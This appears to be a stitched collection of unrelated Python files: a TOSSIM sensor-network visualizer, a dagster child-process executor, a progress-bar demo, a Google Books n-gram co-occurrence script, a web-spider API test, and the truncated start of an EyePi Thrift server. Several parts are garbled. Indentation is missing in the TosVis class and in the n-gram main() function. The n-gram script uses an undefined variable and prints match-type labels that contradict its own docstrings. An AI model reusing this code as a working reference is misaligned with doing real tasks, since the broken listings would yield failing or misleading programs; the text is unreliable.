# corresponding to the particular LED based on
# the index in the list. An entry is of the format [[posx,posy],[r,g,b]], where
# (posx,posy) indicates the position relative to the node's center, and
# (r,g,b) indicates the displayed color (0 <= r,g,b <= 1).
LEDS_CONFIG = [
[ [ 5, 5], [1.0, 0.0, 0.0] ],
[ [ 0, 5], [0.0, 0.8, 0.0] ],
[ [-5, 5], [0.0, 0.0, 1.0] ],
]
###############################################
class Node(object):
    '''
    Defines a generic node object used as a handler for a node modeled in
    TOSSIM.
    '''

    # Regexes for the TOSSIM debug channel lines this class understands.
    LED_RE = re.compile(r'LEDS: Led(\d) (.*)\.')
    AMSEND_RE = re.compile(r'AM: Sending packet \(id=(\d+), len=(\d+)\) to (\d+)')
    AMRECV_RE = re.compile(r'Received active message \(0x[0-9a-f]*\) of type (\d+) and length (\d+)')

    txRange = 100 # default transmission range

    #################################
    def __init__(self, location, txRange=100):
        '''
        The class constructor.

        @param location
            tuple (x,y) indicating node's location
        @param txRange
            (optional) transmission range of the node.
        '''
        self.location = location
        self.txRange = txRange
        # the following attributes will be set by TosVis
        self.id = None
        self.tosvis = None
        self.tossimNode = None

    ####################
    def animateLeds(self,time,ledno,state):
        '''
        Animates LEDs status
        '''
        scene = self.tosvis.scene
        (x,y) = self.location
        shape_id = '%d:%d' % (self.id,ledno)
        if state == 0:
            # LED turned off - remove its shape from the canvas.
            scene.execute(time, scene.delshape, shape_id)
            return
        if ledno < len(LEDS_CONFIG):
            # Draw a small colored circle at the LED's configured offset.
            pos,color = LEDS_CONFIG[ledno]
            x,y = x+pos[0],y+pos[1]
            scene.execute(time, scene.circle, x, y, 2, id=shape_id,
                line=LineStyle(color=color), fill=FillStyle(color=color))

    ####################
    def animateAmSend(self,time,amtype,amlen,amdst):
        '''
        Animates transmission of radio packet for the specified
        ActiveMessage type ID
        '''
        scene = self.tosvis.scene
        (x,y) = self.location
        # Bug fix: removed a stray no-op ``range`` expression that sat here
        # with no effect.
        scene.execute(time, scene.circle, x, y, self.txRange,
            line=LineStyle(color=(1,0,0),dash=(1,1)),delay=.1)

    ####################
    def animateAmRecv(self,time,amtype,amlen):
        '''
        Animates reception of radio packet for the specified
        ActiveMessage type ID
        '''
        scene = self.tosvis.scene
        (x,y) = self.location
        scene.execute(time, scene.circle, x, y, 10,
            line=LineStyle(color=(0,0,1),width=3),delay=.1)

    #################################
    def processDbgMsg(self, dbgMsg):
        '''
        Matches one TOSSIM debug line against the known patterns and triggers
        the corresponding animation.
        '''
        simTime = self.tosvis.simTime()
        # LED message
        match = self.LED_RE.match(dbgMsg)
        if match:
            ledno = int(match.group(1))
            stateStr = match.group(2)
            if stateStr == 'off':
                state = 0
            else:
                state = 1
            self.animateLeds(simTime, ledno, state)
        # AM Send message
        match = self.AMSEND_RE.match(dbgMsg)
        if match:
            amtype = int(match.group(1))
            amlen = int(match.group(2))
            amdst = int(match.group(3))
            self.animateAmSend(simTime, amtype, amlen, amdst)
        # AM Receive message
        match = self.AMRECV_RE.match(dbgMsg)
        if match:
            amtype = int(match.group(1))
            amlen = int(match.group(2))
            self.animateAmRecv(simTime, amtype, amlen)
###############################################
class TosVis(object):
DEBUG_RE = re.compile(r'DEBUG \((\d+)\): (.*)')
####################
def __init__(self, maxTime, autoBoot=True, showDebug=True):
'''
The class constructor.
@param maxTime
time limit for which the simulation will run
@param showDebug
(optional) flag to indicate whether all debugging messages from TOSSIM
should also be displayed on the console
'''
self.tossim = Tossim([])
## Check if nextEventTime() is available in TOSSIM.
## This function is necessary to simulate mobility
#if 'nextEventTime' not in dir(self.tossim):
# print 'Error: TosVis requires nextEventTime() in TOSSIM'
# quit()
self.maxTime = maxTime * self.tossim.ticksPerSecond()
self.showDebug = showDebug
self.nodes = []
self.evq = [] # custom event queue
# setup a pipe for monitoring dbg messages
r,w = os.pipe()
self.dbg_read = os.fdopen(r, 'r')
self.dbg_write = os.fdopen(w, 'w')
self.tossim.addChannel('LedsC', self.dbg_write)
self.tossim.addChannel('AM', self.dbg_write)
####################
def simTime(self):
'''
Returns the current simulation time in seconds
'''
return float(self.tossim.time())/self.tossim.ticksPerSecond()
####################
def addNode(self, node, autoBoot=True):
'''
Adds a new node to the simulation.
@param node
The node object to be added. It must be an instant of the Node class
or any of its subclasses.
@param autoBoot
(optional) flag to indicate whether the added node will be turned
on automatically
@return index of the added node in the 'nodes' list
'''
id = len(self.nodes)
node.id = id
node.tosvis = self
node.tossimNode = self.tossim.getNode(id)
self.createNoiseModel(node)
self.nodes.append(node)
# Randomly set the boot time for the node if autoBoot is true
if autoBoot:
node.tossimNode.bootAtTime(int(random()*self.tossim.ticksPerSecond()))
return id
####################
def setupRadio(self):
'''
Creates ideal radio links for node pairs that are in range
'''
radio = self.tossim.radio()
num_nodes = len(self.nodes)
for i,ni in enumerate(self.nodes):
for j,nj in enumerate(self.nodes):
if i != j:
(isLinked, gain) = self.computeRFGain(ni, nj)
if isLinked:
radio.add(i, j, gain)
####################
def createNoiseModel(self, node):
'''
Obtained from TOSSIM example. No idea what this is.
'''
for i in range(100):
node.tossimNode.addNoiseTraceReading(int(random()*20)-100)
node.tossimNode.createNoiseModel()
####################
def computeRFGain(self, src, dst):
'''
Returns signal reception gain between src and dst using a simple
tx-range model. Should be overriden with a more realistic
propagation model.
'''
if src == dst:
return (False, 0)
(x1,y1) = src.location
(x2,y2) = dst.location
dx = x1 - x2;
dy = y1 - y2;
if math.sqrt(dx*dx + dy*dy) <= src.txRange:
return (True, 0)
else:
return (False, 0)
####################
def moveNode(self, node, location, time=None):
'''
Schedules the specified node to move to the new location at the
specified time. If time is omitted, move the node immediately.
'''
# This function requires access to the simulation queue. TOSSIM must be
# patched for it to work
raise Exception("Node mobility is not yet supported.")
####################
def processDbgMsg(self, dbgMsg):
match = self.DEBUG_RE.match(dbgMsg)
if not match: return
id = int(match.group(1))
detail = match.group(2)
self.nodes[id].processDbgMsg(detail)
####################
def run_tossim(self):
'''
Starts TOSSIM and captures/processes debugging messages. (To be
started in a separate thread.)
'''
self.setupRadio()
while (self.tossim.time() < self.maxTime):
if self.tossim.runNextEvent() == 0:
break
r,w,e = select.select([self.dbg_read.fileno()],[],[],0)
if len(r) == 1:
dbg = self.dbg_read.readline()
self.processDbgMsg(dbg)
if self.showDebug:
sys.stdout.write('%.3f : %s' % (self.simTime(), dbg))
####################
def run(self):
    '''
    Starts simulation with visualization: draws every node on an
    animating canvas, runs TOSSIM in a background daemon thread, and
    enters Tk's mainloop on the calling thread (blocks until the
    window is closed).
    '''
    # Setup an animating canvas
    scene = Scene(timescale=1)
    tkplot = Plotter()
    self.scene = scene
    self.tkplot = tkplot
    scene.addPlotter(tkplot)
    # draw nodes on animating canvas
    for n in self.nodes:
        scene.node(n.id, n.location[0], n.location[1])
    # start TOSSIM thread and enter Tk's mainloop
    thr = Thread(target=self.run_tossim)
    # FIX: Thread.setDaemon() is deprecated (removed in Python 3.13);
    # assigning the daemon attribute is equivalent on Python 2 and 3.
    thr.daemon = True
    thr.start()
    tkplot.tk.mainloop()
|
child_process_executor.py | '''Facilities for running arbitrary commands in child processes.'''
import os
import queue
import sys
from abc import ABCMeta, abstractmethod
from collections import namedtuple
import six
from dagster import check
from dagster.seven import multiprocessing
from dagster.utils.error import serializable_error_info_from_exc_info
class ChildProcessEvent(object):
    '''Base class for events sent from the child process to the parent.'''
    pass
class ChildProcessStartEvent(namedtuple('ChildProcessStartEvent', 'pid'), ChildProcessEvent):
    '''Emitted first by the child, carrying its OS pid.'''
    pass
class ChildProcessDoneEvent(namedtuple('ChildProcessDoneEvent', 'pid'), ChildProcessEvent):
    '''Emitted when the child's command finished without error.'''
    pass
class ChildProcessSystemErrorEvent(
    namedtuple('ChildProcessSystemErrorEvent', 'pid error_info'), ChildProcessEvent
):
    '''Emitted when the child's command raised; carries serialized error info.'''
    pass
class ChildProcessCommand(six.with_metaclass(ABCMeta)):  # pylint: disable=no-init
    '''Inherit from this class in order to use this library.
    The object must be picklable; instantiate it and pass it to _execute_command_in_child_process.'''

    @abstractmethod
    def execute(self):
        ''' This method is invoked in the child process.
        Yields a sequence of events to be handled by _execute_command_in_child_process.'''
class ChildProcessCrashException(Exception):
    '''Thrown when the child process crashes.'''
def _execute_command_in_child_process(event_queue, command):
    '''Wraps the execution of a ChildProcessCommand.
    Handles errors and communicates across a queue with the parent process.'''
    check.inst_param(command, 'command', ChildProcessCommand)
    pid = os.getpid()
    event_queue.put(ChildProcessStartEvent(pid=pid))
    try:
        for step_event in command.execute():
            event_queue.put(step_event)
        event_queue.put(ChildProcessDoneEvent(pid=pid))
    except (Exception, KeyboardInterrupt):  # pylint: disable=broad-except
        # Every failure (including Ctrl-C) is serialized and forwarded to
        # the parent instead of crashing silently in the child.
        event_queue.put(
            ChildProcessSystemErrorEvent(
                pid=pid, error_info=serializable_error_info_from_exc_info(sys.exc_info())
            )
        )
    finally:
        # Close the queue so its feeder thread flushes before the child exits.
        event_queue.close()
TICK = 20.0 * 1.0 / 1000.0
'''The minimum interval at which to check for child process liveness -- default 20ms.'''
PROCESS_DEAD_AND_QUEUE_EMPTY = 'PROCESS_DEAD_AND_QUEUE_EMPTY'
'''Sentinel value.'''
def _poll_for_event(process, event_queue):
    '''Poll *event_queue* for up to TICK seconds and check child liveness.

    Returns an event from the queue, a KeyboardInterrupt instance
    (returned -- not raised -- so the caller can forward it),
    PROCESS_DEAD_AND_QUEUE_EMPTY when the child died and the queue is
    drained, or None when nothing happened during this tick.
    '''
    try:
        return event_queue.get(block=True, timeout=TICK)
    except KeyboardInterrupt as e:
        return e
    except queue.Empty:
        if not process.is_alive():
            # There is a possibility that after the last queue.get the
            # process created another event and then died. In that case
            # we want to continue draining the queue.
            try:
                return event_queue.get(block=False)
            except queue.Empty:
                # If the queue empty we know that there are no more events
                # and that the process has died.
                return PROCESS_DEAD_AND_QUEUE_EMPTY
    return None
def execute_child_process_command(command):
    '''Execute a ChildProcessCommand in a new process.
    This function starts a new process whose execution target is a ChildProcessCommand wrapped by
    _execute_command_in_child_process; polls the queue for events yielded by the child process
    until the process dies and the queue is empty.
    This function yields a complex set of objects to enable having multiple child process
    executions in flight:
    * None - nothing has happened, yielded to enable cooperative multitasking other iterators
    * ChildProcessEvent - Family of objects that communicates state changes in the child process
    * KeyboardInterrupt - Yielded in the case that an interrupt was recieved while
    polling the child process. Yielded instead of raised to allow forwarding of the
    interrupt to the child and completion of the iterator for this child and
    any others that may be executing
    * The actual values yielded by the child process command
    Args:
    command (ChildProcessCommand): The command to execute in the child process.
    Warning: if the child process is in an infinite loop, this will
    also infinitely loop.
    '''
    check.inst_param(command, 'command', ChildProcessCommand)
    event_queue = multiprocessing.Queue()
    process = multiprocessing.Process(
        target=_execute_command_in_child_process, args=(event_queue, command)
    )
    process.start()
    completed_properly = False
    while not completed_properly:
        event = _poll_for_event(process, event_queue)
        if event == PROCESS_DEAD_AND_QUEUE_EMPTY:
            break
        yield event
        if isinstance(event, (ChildProcessDoneEvent, ChildProcessSystemErrorEvent)):
            completed_properly = True
    if not completed_properly:
        # BUG FIX: reap the dead child before raising; previously the raise
        # skipped process.join(), leaving a zombie process behind.
        process.join()
        # TODO Gather up stderr and the process exit code
        raise ChildProcessCrashException()
    process.join()
|
two-tasks.py | #!/usr/bin/env python
"""
Two progress bars that run in parallel.
"""
import threading
import time
import quo
def main():
    """Run two progress bars that advance in parallel inside one ProgressBar."""
    with quo.ProgressBar() as progress:

        def first_task():
            for _ in progress(range(100)):
                time.sleep(0.05)

        def second_task():
            for _ in progress(range(150)):
                time.sleep(0.08)

        workers = [
            threading.Thread(target=first_task),
            threading.Thread(target=second_task),
        ]
        for worker in workers:
            worker.daemon = True
            worker.start()
        # Wait for the threads to finish. We use a timeout for the join() call,
        # because on Windows, join cannot be interrupted by Control-C or any other
        # signal.
        for worker in workers:
            while worker.is_alive():
                worker.join(timeout=0.5)
if __name__ == "__main__":
main()
|
parallelGram.py | __author__ = 'joe'
import collections
import gzip
import io
import multiprocessing
import os
import pickle
import re
import sys
import urllib
from collections import Counter
from collections import defaultdict

import dill
import numpy as np
import pandas as pd
import requests
def getFiles(ngram_path):
    """
    Gets list of ngram file names: every non-hidden regular file
    directly inside *ngram_path* (directories are skipped).
    :param ngram_path: directory to scan
    :return: list of ngram file names
    """
    return [
        entry
        for entry in os.listdir(ngram_path)
        if os.path.isfile(os.path.join(ngram_path, entry))
        and not entry.startswith('.')
    ]
def getWords(wordPath):
    """
    Get list of words from specified file.

    The file is expected to contain a single comma-separated line.
    NOTE(review): opens in binary mode and splits with a str comma --
    this only works on Python 2 (the module uses py2 print statements).

    :param wordPath: path to the comma-separated word list
    :return: Get the words specified in input file
    """
    with open(wordPath, 'rb') as wf:
        words = [w.strip() for w in wf.readline().split(',')]
    return(words)
def getNegWords(wordPath):
    """
    Build a negation-exclusion regex prefix from the words in the file.

    Each comma-separated word w becomes a negative lookbehind '(?<!w )',
    and the lookbehinds are concatenated so a match is rejected when any
    negation word immediately precedes it.
    NOTE(review): Python 2 only (binary read + str split), like getWords.

    :param wordPath: path to the comma-separated negation-word list
    :return: concatenated negative-lookbehind regex string
    """
    with open(wordPath, 'rb') as wf:
        lb1 = r'(?<!'
        lb2 = r' )'
        negReg = ''.join([lb1 + nw.strip() + lb2 for nw in wf.readline().split(',')])
    return(negReg)
def chunks(l, nJobs):
    """
    Split l files into nJobs roughly equal chunks.

    :param l: list to split
    :param nJobs: requested number of jobs/chunks
    :return: Yield successive slices of l

    BUG FIX: the original computed ``n = len(l)/nJobs``, which (a) is a
    float under Python 3, making range() raise TypeError, and (b) is 0
    whenever nJobs > len(l), making range() raise "arg 3 must not be
    zero". Integer division with a floor of 1 fixes both without
    changing the result for previously-working inputs.
    """
    n = max(1, len(l) // nJobs)
    # For item i in a range that is a length of l,
    for i in range(0, len(l), n):
        # Create an index range for l of n items:
        yield l[i:i + n]
def mergeDicts(dictList):
    """
    Because this program splits the search across jobs, we need a way to
    combine the results. Merges a list of two-level {key: {key: int}}
    mappings by summing the integer leaf counts; non-int leaves are
    silently skipped.
    :param dictList: iterable of nested count dictionaries
    :return: A dictionary containing all co-occurrences
    """
    merged = defaultdict(lambda: defaultdict(lambda: 0))
    for source in dictList:
        for outer_key, inner in source.items():
            for inner_key, count in inner.items():
                # Preserve the original strict type check (excludes bool
                # subclasses and anything non-int).
                if type(count) == int:
                    merged[outer_key][inner_key] += int(count)
    return (merged)
def gnTotal(url):
    """
    Google provides a count of total ngrams for a given size.
    This function downloads that file and gets totals for each year.

    NOTE(review): uses the Python 2 ``urllib.urlopen`` API; under
    Python 3 this would need urllib.request.urlopen.

    :param url: URL of the Google Books total-counts file
    :return: pandas DataFrame with year/total_words/total_pages/total_volumes columns
    """
    response = urllib.urlopen(url)
    # The whole file is one line of tab-separated 'year,words,pages,volumes' records.
    lines = response.readlines()[0].split('\t')
    total_counts = {'year': [], 'total_words': [], 'total_pages': [], 'total_volumes': []}
    for line in lines:
        line = line.split(',')
        # Keep only well-formed 4-field records.
        if len(line) == 4:
            total_counts['year'].append(line[0])
            total_counts['total_words'].append(line[1])
            total_counts['total_pages'].append(line[2])
            total_counts['total_volumes'].append(line[3])
    totalCountsDf = pd.DataFrame.from_dict(total_counts)
    return(totalCountsDf)
def chunkGrams3(ngram_chunk, baseWords, targetWords, output_path, ngram_path, negReg):
    """
    This function using pattern matching to identify co-occurrences,
    excluding matches preceded by a negation word (via the negReg
    lookbehind prefix built by getNegWords()).
    :param ngram_chunk: The files to search through for given job
    :param baseWords: List of base words
    :param targetWords: List of target words
    :param output_path: Where should results be stored?
    :param ngram_path: Where are the ngrams?
    :param negReg: Negation lookbehind regex prefix to exclude by
    :return: Nothing. Dumps results to pickeled file

    NOTE(review): re.search(...).group(0) is used as a membership test;
    the bare excepts swallow the AttributeError from a failed search
    (and everything else). Requires ``re`` to be imported at module level.
    """
    wordFreqs = defaultdict(lambda: defaultdict(lambda: 0))
    coFreqs = defaultdict(lambda: defaultdict(lambda: 0))
    wordVols = defaultdict(lambda: defaultdict(lambda: 0))
    coVols = defaultdict(lambda: defaultdict(lambda: 0))
    file_counter = 0
    total_files = len(ngram_chunk) + 1
    baseWords = baseWords + ['behebung']
    targetWords = targetWords
    for ngram_file in ngram_chunk:
        file_counter +=1
        print 'Analyzing file {0} of {1} in chunk'.format(file_counter, total_files)
        cur_file = gzip.open(os.path.join(ngram_path, ngram_file), 'rb')
        # dat fields: phrase, year, match count, volume count (Google ngram layout -- assumed)
        for line in cur_file:
            dat = line.split('\t')
            phrase = dat[0].lower()
            if any(baseWord in phrase for baseWord in baseWords):  # If contains baseword then
                if any(targetWord in phrase for targetWord in targetWords):  # If also contains target word, then
                    for bWord in baseWords:
                        reg = negReg + r'\b' + re.escape(bWord) + r'\b'
                        try:
                            re.search(reg, phrase).group(0)
                            wordFreqs[dat[1]][bWord] += int(dat[2])
                            wordVols[dat[1]][bWord] += int(dat[3].replace('\n', ''))
                            for tWord in targetWords:
                                regT = negReg + r'\b' + re.escape(tWord) + r'\b'
                                try:
                                    re.search(regT, phrase).group(0)
                                    wordFreqs[dat[1]][tWord] += int(dat[2])
                                    wordVols[dat[1]][tWord] += int(dat[3].replace('\n', ''))
                                    coFreqs[dat[1]]['_'.join([bWord,tWord])] += int(dat[2])
                                    coVols[dat[1]]['_'.join([bWord,tWord])] += int(dat[3].replace('\n', ''))
                                except:
                                    continue
                        except:
                            continue
                else:
                    for bWord in baseWords:
                        reg = negReg + r'\b' + re.escape(bWord) + r'\b'
                        try:
                            re.search(reg, phrase).group(0)
                            wordFreqs[dat[1]][bWord] += int(dat[2])
                            wordVols[dat[1]][bWord] += int(dat[3].replace('\n', ''))
                        except:
                            continue
            elif any(targetWord in phrase for targetWord in targetWords):
                for tWord in targetWords:
                    regT = negReg + r'\b' + re.escape(tWord) + r'\b'
                    try:
                        print re.search(regT, phrase).group(0)
                        wordFreqs[dat[1]][tWord] += int(dat[2])
                        wordVols[dat[1]][tWord] += int(dat[3].replace('\n', ''))
                    except:
                        continue
    dictFreqs = mergeDicts(dictList=[wordFreqs,coFreqs])
    dictVols = mergeDicts(dictList=[wordVols,coVols])
    ds = [dictFreqs, dictVols]
    print 'Writing {0}'.format(output_path)
    dill.dump(ds, open(output_path, 'wb'))
def chunkGrams2(ngram_chunk, baseWords, targetWords, output_path, ngram_path):
    """
    This function using pattern matching (word-boundary regexes) to
    identify co-occurrences.
    :param ngram_chunk: The files to search through for given job
    :param baseWords: List of base words
    :param targetWords: List of target words
    :param output_path: Where should results be stored?
    :param ngram_path: Where are the ngrams?
    :return: Nothing. Dumps results to pickeled file

    NOTE(review): identical to chunkGrams3 minus the negation prefix;
    bare excepts swallow failed re.search() lookups. Requires ``re``
    to be imported at module level.
    """
    wordFreqs = defaultdict(lambda: defaultdict(lambda: 0))
    coFreqs = defaultdict(lambda: defaultdict(lambda: 0))
    wordVols = defaultdict(lambda: defaultdict(lambda: 0))
    coVols = defaultdict(lambda: defaultdict(lambda: 0))
    file_counter = 0
    total_files = len(ngram_chunk) + 1
    baseWords = baseWords + ['behebung']
    targetWords = targetWords
    for ngram_file in ngram_chunk:
        file_counter +=1
        print 'Analyzing file {0} of {1} in chunk'.format(file_counter, total_files)
        cur_file = gzip.open(os.path.join(ngram_path, ngram_file), 'rb')
        # dat fields: phrase, year, match count, volume count (Google ngram layout -- assumed)
        for line in cur_file:
            dat = line.split('\t')
            phrase = dat[0].lower()
            if any(baseWord in phrase for baseWord in baseWords):  # If contains baseword then
                if any(targetWord in phrase for targetWord in targetWords):  # If also contains target word, then
                    for bWord in baseWords:
                        reg = r'\b' + re.escape(bWord) + r'\b'
                        try:
                            re.search(reg, phrase).group(0)
                            wordFreqs[dat[1]][bWord] += int(dat[2])
                            wordVols[dat[1]][bWord] += int(dat[3].replace('\n', ''))
                            for tWord in targetWords:
                                regT = r'\b' + re.escape(tWord) + r'\b'
                                try:
                                    re.search(regT, phrase).group(0)
                                    wordFreqs[dat[1]][tWord] += int(dat[2])
                                    wordVols[dat[1]][tWord] += int(dat[3].replace('\n', ''))
                                    coFreqs[dat[1]]['_'.join([bWord,tWord])] += int(dat[2])
                                    coVols[dat[1]]['_'.join([bWord,tWord])] += int(dat[3].replace('\n', ''))
                                except:
                                    continue
                        except:
                            continue
                else:
                    for bWord in baseWords:
                        reg = r'\b' + re.escape(bWord) + r'\b'
                        try:
                            re.search(reg, phrase).group(0)
                            wordFreqs[dat[1]][bWord] += int(dat[2])
                            wordVols[dat[1]][bWord] += int(dat[3].replace('\n', ''))
                        except:
                            continue
            elif any(targetWord in phrase for targetWord in targetWords):
                for tWord in targetWords:
                    regT = r'\b' + re.escape(tWord) + r'\b'
                    try:
                        print re.search(regT, phrase).group(0)
                        wordFreqs[dat[1]][tWord] += int(dat[2])
                        wordVols[dat[1]][tWord] += int(dat[3].replace('\n', ''))
                    except:
                        continue
    dictFreqs = mergeDicts(dictList=[wordFreqs,coFreqs])
    dictVols = mergeDicts(dictList=[wordVols,coVols])
    ds = [dictFreqs, dictVols]
    print 'Writing {0}'.format(output_path)
    dill.dump(ds, open(output_path, 'wb'))
def chunkGrams1(ngram_chunk, baseWords, targetWords, output_path, ngram_path):
    """
    This function using exact matching (plain substring tests) to
    identify co-occurrences.
    :param ngram_chunk: The files to search through for given job
    :param baseWords: List of base words
    :param targetWords: List of target words
    :param output_path: Where should results be stored?
    :param ngram_path: Where are the ngrams?
    :return: Nothing. Dumps results to pickeled file
    """
    wordFreqs = defaultdict(lambda: defaultdict(lambda: 0))
    coFreqs = defaultdict(lambda: defaultdict(lambda: 0))
    wordVols = defaultdict(lambda: defaultdict(lambda: 0))
    coVols = defaultdict(lambda: defaultdict(lambda: 0))
    file_counter = 0
    total_files = len(ngram_chunk) + 1
    for ngram_file in ngram_chunk:
        file_counter +=1
        print 'Analyzing file {0} of {1} in chunk'.format(file_counter, total_files)
        cur_file = gzip.open(os.path.join(ngram_path, ngram_file), 'rb')
        # dat fields: phrase, year, match count, volume count (Google ngram layout -- assumed)
        for line in cur_file:
            dat = line.split('\t')
            phrase = dat[0].lower()
            if any(baseWord in phrase for baseWord in baseWords):  # If contains baseword then
                if any(targetWord in phrase for targetWord in targetWords):  # If also contains target word, then
                    for bWord in baseWords:
                        if bWord in phrase:
                            wordFreqs[dat[1]][bWord] += int(dat[2])
                            wordVols[dat[1]][bWord] += int(dat[3].replace('\n', ''))
                            for tWord in targetWords:
                                if tWord in phrase:
                                    wordFreqs[dat[1]][tWord] += int(dat[2])
                                    wordVols[dat[1]][tWord] += int(dat[3].replace('\n', ''))
                                    coFreqs[dat[1]]['_'.join([bWord,tWord])] += int(dat[2])
                                    coVols[dat[1]]['_'.join([bWord,tWord])] += int(dat[3].replace('\n', ''))
                else:
                    for bWord in baseWords:
                        if bWord in phrase:
                            wordFreqs[dat[1]][bWord] += int(dat[2])
                            wordVols[dat[1]][bWord] += int(dat[3].replace('\n', ''))
            elif any(targetWord in phrase for targetWord in targetWords):
                for tWord in targetWords:
                    if tWord in phrase:
                        wordFreqs[dat[1]][tWord] += int(dat[2])
                        wordVols[dat[1]][tWord] += int(dat[3].replace('\n', ''))
    dictFreqs = mergeDicts(dictList=[wordFreqs,coFreqs])
    dictVols = mergeDicts(dictList=[wordVols,coVols])
    ds = [dictFreqs, dictVols]
    print 'Writing {0}'.format(output_path)
    dill.dump(ds, open(output_path, 'wb'))
def main(ngramSyntax = sys.argv[1]):
"""
This function extracts necessary parameters from the parameters txt file
and distributes the jobs across workers.
:param ngramSyntax:
:return:
"""
pars = []
with open(ngramSyntax, 'rb') as ngs:
for line in ngs:
pars.append(line.replace('\n', '').strip())
ngram_path = pars[0]
nJobs = int(pars[1])
output_dir = pars[2]
baseWordPath = pars[3]
targetWordPath = pars[4]
coType = pars[5]
if coType == '3':
negWordPath = pars[6]
negReg = getNegWords(negWordPath)
baseWords = getWords(baseWordPath)
targetWords = getWords(targetWordPath)
print('Calculating n-gram cooccurrence with parameters:\n{0}\n{1}\n{2}\n{3}\n{4}\n{5}\n{6}'.format(ngram_path,
nJobs,
output_dir,
baseWordPath,
targetWordPath,
baseWords,
targetWords))
if coType == '1':
print 'Cooccurrence search based on pattern matching (type 1)'
elif coType == '2':
print 'Cooccurrence search based on exact matching (type 2)'
elif coType == '3':
print 'Cooccurrence search based on exact matching with negation exclusion (type 3)'
print 'Negation words: {0}'.format(negWords)
ngram_files = sorted(getFiles(ngram_path=ngram_path))
ngram_chunks = chunks(ngram_files, nJobs=nJobs)
jobN = 0
output_paths = []
output_dir = output_dir
jobs = []
for chunk in ngram_chunks:
jobN += 1
out_path = output_dir + '/job_' + str(jobN) + '_dict.pickle'
output_paths.append(out_path)
if coType == '1':
p = multiprocessing.Process(target=chunkGrams1, args=(chunk,baseWords,targetWords,out_path,ngram_path,))
if coType == '2':
p = multiprocessing.Process(target=chunkGrams2, args=(chunk, baseWords, targetWords, out_path, ngram_path,))
if coType == '3':
p = multiprocessing.Process(target=chunkGrams3, args=(chunk, baseWords, targetWords, out_path, ngram_path,negReg,))
jobs.append(p)
for p in jobs:
p.start()
for p in jobs:
print 'Joining {0} thread'.format(p)
p.join()
return(output_paths)
def getGnDicts(output_paths, ngramSyntax):
    """This function combines the objects saved by the main() function and also
    downloads and combines total ngram counts.

    :param output_paths: per-job pickle files written by the chunkGrams workers
    :param ngramSyntax: parameter file, re-read here only for the output directory
    """
    pars = []
    with open(ngramSyntax, 'rb') as ngs:
        for line in ngs:
            pars.append(line.replace('\n', '').strip())
    output_dir = pars[2]
    ngramFreqDicts = []
    ngramVolDicts = []
    # Each pickle holds [frequency dict, volume dict] -- see chunkGrams*.
    for dicPath in output_paths:
        dic = dill.load(open(dicPath, 'rb'))
        ngramFreqDicts.append(dic[0])
        ngramVolDicts.append(dic[1])
    ngramFreqs = mergeDicts(ngramFreqDicts)
    ngramFreqsDf = pd.DataFrame.from_dict(ngramFreqs, orient='index')
    ngramVols = mergeDicts(ngramVolDicts)
    ngramVolsDf = pd.DataFrame.from_dict(ngramVols, orient='index')
    url="http://storage.googleapis.com/books/ngrams/books/googlebooks-eng-all-totalcounts-20120701.txt"
    gnTotals = gnTotal(url)
    gnTotals.set_index('year', inplace=True)
    # Align yearly totals alongside the per-word counts.
    ngramFreqsDf = pd.concat([gnTotals, ngramFreqsDf], axis=1)
    ngramVolsDf = pd.concat([gnTotals, ngramVolsDf], axis=1)
    print 'Writing Frequencies to: {0}'.format(output_dir + '/ngramFreqsDf.csv')
    ngramFreqsDf.to_csv(output_dir + '/ngramFreqsDf.csv', sep=',')
    print 'Writing Volumes to: {0}'.format(output_dir + '/ngramVolsDf.csv')
    ngramVolsDf.to_csv(output_dir + '/ngramVolsDf.csv', sep=',')
if __name__ == '__main__':
output_paths = main(ngramSyntax = sys.argv[1])
getGnDicts(output_paths=output_paths, ngramSyntax=sys.argv[1]) |
spider_http_api.py | from threading import Thread
import socket
import time
from six.moves.urllib.request import urlopen
from grab.spider import Spider, Task
from tests.util import BaseGrabTestCase, build_spider
class BasicSpiderTestCase(BaseGrabTestCase):
    """Tests for the Spider's built-in HTTP monitoring API."""

    def setUp(self):
        # Start each test from a clean mock-server state.
        self.server.reset()

    def get_open_port(self):
        """Ask the OS for a free TCP port by binding to port 0, then release it."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.bind(("", 0))
        sock.listen(1)
        port = sock.getsockname()[1]
        sock.close()
        # NOTE(review): the port may be re-taken between close() and reuse;
        # small race window inherent to this technique.
        return port

    def test_spider(self):
        """The spider should serve its API status page while a crawl runs."""
        class SimpleSpider(Spider):
            def task_page(self, grab, unused_task):
                pass
        api_port = self.get_open_port()
        bot = build_spider(
            SimpleSpider, http_api_port=api_port,
        )
        bot.setup_queue()
        # delay=1 keeps the task pending long enough to query the API below.
        bot.add_task(Task('page', url=self.server.get_url(),
                          delay=1))
        def worker():
            bot.run()
        th = Thread(target=worker)  # pylint: disable=invalid-name
        th.daemon = True
        th.start()
        time.sleep(0.5)
        data = urlopen('http://localhost:%d' % api_port).read()
        self.assertTrue(b'<title>Grab Api</title>' in data)
|
PythonEyePiServer.py | #!/usr/bin/env python
import sys
import consul
import signal
from multiprocessing.managers import SyncManager
sys.path.append('src/gen-py')
from connect.PythonFacePiClient import FacePiThriftClient
from connect.GenericThriftClient import GenericThriftClient
from connect.LongTermPersonMemoryClient import LongTermPersonMemoryClient
from connect.ShortTermLogMemoryClient import ShortTermLogMemoryClient
from connect.ShortTermTokenMemoryClient import ShortTermTokenMemoryClient
from EyePi import EyePiThriftService
from EyePi.ttypes import LoginOutputObject
from EyePi.ttypes import EyePiInput
from EyePi.ttypes import EyePiOutput
from ThriftException.ttypes import BadHashException
from ThriftException.ttypes import LoginFailedException
from ThriftException.ttypes import ExternalEndpointUnavailable
from ThriftException.ttypes import ThriftServiceException
from GenericStruct.ttypes import ActionEnum
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from thrift.server import TServer
sys.path.append('../../')
import pickle
import config
import logging
import random
import threading
import statsd
stat = statsd.StatsClient(config.statsd_ip, config.statsd_port)
port = random.randint(58820, 58830)
log = logging.getLogger()
log.setLevel(logging.DEBUG)
class EyePiThriftHandler:
    """Thrift handler implementing the EyePi face-recognition service API."""

    def __init__(self):
        self.log = {}

    @stat.timer("EyePi.login")
    def login(self, loginObject):
        """Authenticate a device/person and hand out device and request tokens.

        Raises BadHashException / LoginFailedException from the person store.
        """
        try:
            output = LoginOutputObject()
            # Nothing to authenticate with: return an empty result.
            if not loginObject.deviceInput and not loginObject.deviceToken:
                return output
            person = LongTermPersonMemoryClient().loginCall(loginObject)
            if person:
                output.uniquename = person.uniquename
